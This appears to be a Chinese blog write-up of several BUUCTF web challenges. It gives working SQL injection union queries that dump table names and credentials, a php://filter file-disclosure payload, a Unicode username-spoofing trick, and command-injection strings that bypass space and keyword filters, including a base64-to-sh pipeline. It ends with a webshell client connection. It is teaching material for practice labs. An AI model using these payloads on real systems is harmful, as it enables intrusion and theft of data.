ctf php文件绕过 菜刀,buuctf 基础sql Group_concat() 伪协议 ᴬᴰᴹᴵᴺUnicode欺骗 各种绕过(内敛绕过) 菜刀...

文章目录

[极客大挑战 2019]LoveSQL

[ACTF2020 新生赛]Include

- [HCTF 2018]admin

[GXYCTF2019]Ping Ping Ping

[极客大挑战 2019]Knife

[极客大挑战 2019]LoveSQL

+ 表示空格(在URL中不能使用空格) %2B

/ 分隔目录和子目录 %2F

? 分隔实际的URL和参数 %3F

# 表示书签 %23

& URL中指定的参数间的分隔符 %26

= URL中指定的参数的值 %3D

150a1c3791a6c573d7b35d03bec01166.png

试一下万能

admin

1’ or ‘1 = 1’#

5eeca55df82c845e5af7916cfebaa4e7.png

md5,换个方向

/check.php?username=admin' order by 4%23&password=1

/check.php?username=admin' order by 3%23&password=1

02842da394d075d8ea3cf2f5406bc944.png

ed5dfce5762a0b9f1cc80d4cbbd7f3f8.png

说明有3个字段

/check.php?username=1' union select 1, 2,3%23&password=1

用union查询测试注入点(回显点位)

5cc0c9bb9d8d2785da7da626a9382919.png

2和3

看数据库和版本

username=1' union select 1,database(),version()%23&password=1

4696168e4446315aebfc8ee2a061333c.png

9fc169cc625f849db357b610d7891923.png

99a577ecd75c108177230616215674d9.png

15128dff8863112b2144609a5913184f.png

a9fff11b489c8cfa4b14fca607fd52c8.png

b9b75b883637a00e340b6af9f27887b1.png

爆库

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

b64edf2752ba0ba8e52fc13c834897db.png

爆表

/check.php?username=1' union select 1,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

ce1f35e120c7dba3e2595f8f86ab2207.png

/check.php?username=1' union select 1,3,group_concat(id,username,password) from l0ve1ysq1%23&password=1

1ae4113b9bd536b81884ac71ffce8da1.png

[ACTF2020 新生赛]Include

filter伪协议

?file=php://filter/convert.base64-encode/resource=flag.php

7412919a0af8291c6425ba0979f8ea87.png

base64解码后得到flag

关于伪协议:

https://zhuanlan.zhihu.com/p/49206578

- [HCTF 2018]admin

第一种,直接登进去:admin,123,就进去了……

第二种,Unicode欺骗,使用ᴬᴰᴹᴵᴺ,然后改密码,再登录,你就是admin了

[GXYCTF2019]Ping Ping Ping

5a075e5ec86e5dfee2fd5c69e402f648.png

进去先随便输点什么

cat flag

e2e91d9f1b8a6a5a29f01f61d67ddf49.png

过滤了空格

空格过滤:

${IFS}替换

$IFS$1替换

${IFS替换

%20替换

重定向符替换

%09替换

02b31d27a82d713f357e24c8e07f9272.png

flag不行

那么先ls看看

5b196861767e7b3fcf75fa68c7d6bdb6.png

c598d4dda530939fafd828b99f970f12.png

过滤了这些

那有三种方法:

① ?ip=1;a=g;cat$IFS$1fla$a.php;

②echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

③?ip=127.0.0.1;cat$IFS$1`ls`

第一种就是让a=g,然后绕过

第二种是使用cat flag的bash64编码绕过

echo是打印出来输入的内容,echo打印出cat flag,然后sh执行

第三种是内敛绕过

内敛执行绕过

``将反引号内命令的输出作为输入执行 ls将ls出来的文件作为输入 cat ls

cat绕过:

(1)more:一页一页的显示档案内容

(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页

(3)head:查看头几行

(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

(5)tail:查看尾几行

(6)nl:显示的时候,顺便输出行号

(7)od:以二进制的方式读取档案内容

(8)vi:一种编辑器,这个也可以查看

(9)vim:一种编辑器,这个也可以查看

(10)sort:可以查看

(11)uniq:可以查看

(12)file -f:报错出具体内容

内敛执行绕过

``将反引号内命令的输出作为输入执行 ls将ls出来的文件作为输入 cat ls

https://blog.csdn.net/qq_46184013/article/details/107061110?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param

https://www.ghtwf01.cn/index.php/archives/273/

[极客大挑战 2019]Knife

直接用菜刀连上去就好

b07b6dd8e0d3c544cdf0bdd8b8c64dc0.png

切换到根目录,看到flag,cat flag

f26c6e5b1d965155f7778cba9b722e87.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值